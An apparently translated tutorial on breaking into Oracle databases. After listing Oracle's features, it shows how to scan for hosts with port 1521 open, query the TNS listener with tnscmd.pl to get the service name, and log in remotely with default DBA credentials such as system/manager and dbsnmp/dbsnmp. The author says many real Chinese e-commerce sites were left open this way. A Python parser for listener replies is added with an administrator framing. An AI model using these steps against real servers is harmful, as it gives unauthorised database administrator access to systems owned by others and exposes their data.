Oracle Database is a very popular database system, and many large websites use it. Users favor it for the following outstanding features:
1. High-performance transaction processing for large databases and many users. Oracle supports very large databases, which can reach several hundred gigabytes, and makes full use of the hardware. A large number of users can run different applications against the same data at the same time, with minimal data contention and guaranteed data consistency. Oracle is highly maintainable and can run 24 hours a day. Normal system operations (backups or some computer system faults) do not interrupt use of the database. The availability of data can be controlled at the database level or at the sub-database level.
2. Compliance with industry standards. Oracle follows industry standards for data access languages, operating systems, user interfaces, and network communication protocols, so it is an open system that protects users' investment. The National Institute of Standards and Technology (NIST) tested Oracle7 Server and found it 100% compatible with Level 2 of the ANSI/ISO SQL89 standard.
3. Security control and integrity control. Oracle provides reliable system security to restrict and monitor access to data. Oracle enforces data integrity, which specifies the standards for acceptable data.
4. Support for distributed databases and distributed processing. To make full use of computer systems and networks, Oracle lets processing be divided between the database server and client applications. All shared data management is handled by the computer running the database management system, while the workstations running database applications concentrate on interpreting and displaying data. In a networked environment, Oracle combines data stored on multiple computers into one logical database that all network users can access. Distributed systems are as transparent and as consistent as centralized databases.
5. Portability, compatibility, and connectivity. Because Oracle software runs on many different operating systems, applications developed on Oracle can be ported to any of them with little or no modification. Oracle software is compatible with industry standards, including many industry-standard operating systems, so the applications developed can run on any of those operating systems. Connectivity means that Oracle allows different types of computers and operating systems to share information over the network.
Although the Oracle database offers strong security, it is still very dangerous if we do not pay attention to security during configuration. In other words, security depends above all on people rather than on software.
As we know, in MSSQL the sa login has a blank password by default after installation, and if you do not change it, that is a security vulnerability. What about Oracle? It has the same problem. For ease of installation and debugging, the default password of Sys and System, the two users with DBA permissions in Oracle Database, is manager. I found that Oracle databases on many Chinese websites, including many large e-commerce websites, had not changed the passwords of these two users, so we can use this default password to find things we are interested in. The details follow.
Before testing, we need some background. To connect to an Oracle database we need to know its service_name or SID value, just as with MSSQL we need to know the database name. So how can we know? Obviously, this is not the case. Here we first need to talk about Oracle's TNS listener, which sits between the database client and the database server. By default it listens on port 1521, which can be changed. However, if you open a plain TCP session to port 1521, Oracle does not return a banner, and if you type something it may even drop the connection. This is where tnscmd.pl, a Perl program, comes in. It can check whether the remote Oracle listener is up (that is, ping it), query its version, and query its service name, service status, and database service name, with very high accuracy.
If any of the theory is unfamiliar, you can look up the relevant material. Now let's start testing. The required tools are ActivePerl, the Oracle client, Superscan or another port scanner, and tnscmd.pl.
We first use Superscan to scan for hosts with port 1521 open. Assume the IP address found is xx.xx.110.110, so we now have a target. Next we use tnscmd.pl to query the service name of the remote database. The usage of tnscmd.pl is as follows:
    C:\perl\bin>perl tnscmd.pl
    usage: tnscmd.pl [command] -h hostname
           where 'command' is something like ping, version, status, etc.
           (default is ping)
           [-p port] - alternate TCP port to use (default is 1521)
           [--logfile] - write raw packets to specified logfile
           [--indent] - indent & outdent on parens
           [--rawcmd command] - build your own CONNECT_DATA string
           [--cmdsize bytes] - fake TNS command size (reveals packet leakage)
Below we use only a few simple commands; the others are also very useful and worth exploring.
We then run:
    C:\perl\bin>perl tnscmd.pl services -h xx.xx.110.110 -p 1521 --indent
    sending (CONNECT_DATA=(COMMAND=services)) to xx.xx.110.110:1521
    writing 91 bytes
    reading
    ...... 6 .........?. ..........
      DESCRIPTION=
        TMP=
        VSNNUM=135286784
        ERR=0
        SERVICES_EXIST=1
    . Q ........
      SERVICE=
        SERVICE_NAME=ORCL
        INSTANCE=
          INSTANCE_NAME=ORCL
          NUM=1
          INSTANCE_CLASS=ORACLE
          HANDLER=
            HANDLER_DISPLAY=DEDICATED SERVER
            STA=ready
            HANDLER_INFO=LOCAL SERVER
            HANDLER_MAXLOAD=0
            HANDLER_LOAD=0
            ESTABLISHED=447278
            REFUSED=0
            HANDLER_ID=8CA61D1BBDA6-3F5C-E030-813DF5430227
            HANDLER_NAME=DEDICATED
            ADDRESS=
              PROTOCOL=beq
              PROGRAM=/home/oracle/bin/oracle
              ENVS='ORACLE_HOME=/home/oracle,ORACLE_SID=ORCL'
              ARGV0=oracleORCL
              ARGS='
                LOCAL=NO
              '
    .........@
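As an added example (not part of the original article and not tnscmd.pl code), this Python parser reads a `services` reply and summarises what a listener tells any client that can reach port 1521, which is the inventory an administrator needs before restricting access to the listener. `REPLY` is rebuilt from the values printed above, and the function names are illustrative.

```python
# Constructed sample: the values printed above, put back into TNS (KEY=value)
# form with the binary framing bytes and some handler fields left out.
REPLY = (
    "(DESCRIPTION=(TMP=)(VSNNUM=135286784)(ERR=0)(SERVICES_EXIST=1))"
    "(SERVICE=(SERVICE_NAME=ORCL)(INSTANCE=(INSTANCE_NAME=ORCL)(NUM=1)"
    "(HANDLER=(STA=ready)(ADDRESS=(PROTOCOL=beq)(PROGRAM=/home/oracle/bin/oracle)"
    "(ENVS='ORACLE_HOME=/home/oracle,ORACLE_SID=ORCL')(ARGS='(LOCAL=NO)')))))"
)

def parse(text, i=0):
    """Parse consecutive (KEY=value) groups from text[i:]; return (pairs, next index)."""
    pairs = []
    while text.startswith("(", i):
        eq = text.index("=", i)              # ValueError if the group has no '='
        key, i = text[i + 1:eq], eq + 1
        if text.startswith("(", i):          # value is a list of nested groups
            value, i = parse(text, i)
        elif text.startswith("'", i):        # quoted value, may contain parentheses
            end = text.index("'", i + 1)
            value, i = text[i + 1:end], end + 1
        else:                                # bare value, possibly empty as in (TMP=)
            end = text.index(")", i)
            value, i = text[i:end], end
        if not text.startswith(")", i):
            raise ValueError(f"unbalanced group {key!r} at offset {i}")
        pairs.append((key, value))
        i += 1
    return pairs, i

def leaves(pairs):  # every (key, scalar value) pair in the tree, depth first
    for key, value in pairs:
        yield from leaves(value) if isinstance(value, list) else [(key, value)]

def decode_vsnnum(n):  # VSNNUM packs the release number as 8/4/8/4/8-bit fields
    n = int(n)
    return ".".join(map(str, (n >> 24, (n >> 20) & 0xF, (n >> 12) & 0xFF, (n >> 8) & 0xF, n & 0xFF)))

def disclosed(reply, keys=("SERVICE_NAME", "INSTANCE_NAME", "PROGRAM", "ENVS")):
    # Collect the fields that identify the version, service and install path.
    pairs, end = parse(reply)
    if end != len(reply):
        raise ValueError(f"unparsed data at offset {end}")
    found = {}
    for key, value in leaves(pairs):
        if key == "VSNNUM":
            found["version"] = decode_vsnnum(value)
        elif key in keys:
            found.setdefault(key, []).append(value)
    return found
```

For the sample, `disclosed(REPLY)` reports release 8.1.5.0.0, the service and instance name ORCL, the server binary path, and the ORACLE_HOME and ORACLE_SID values, all obtained without a login.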
From the output above, we can see that the database service is named ORCL. We can then connect to it remotely with the sqlplus tool, using the default system/manager or sys/manager as the user name and password. Others such as mdsys/mdsys and ctxsys can also be used; the default users and passwords change with the version. As follows:
    C:\oracle\ora90\BIN>sqlplus /nolog
    SQL*Plus: Release 9.0.1.0.1 - Production on Thu May 23 11:36:59 2002
    (c) Copyright 2001 Oracle Corporation. All rights reserved.
    SQL> connect system/manager@(description=(address_list=(address=(protocol=tcp)(host=xx.xx.110.110)(port=1521)))(connect_data=(SERVICE_NAME=ORCL)));
If the password is correct, the system will prompt Connected. If not, switch to another default user name and password. After my attempt, dbsnmp and dbsnmp can be used. Of course, if the other party has changed the default passwords, we can only move on to another target. However, I found that many of them do not change them. This is a security awareness problem.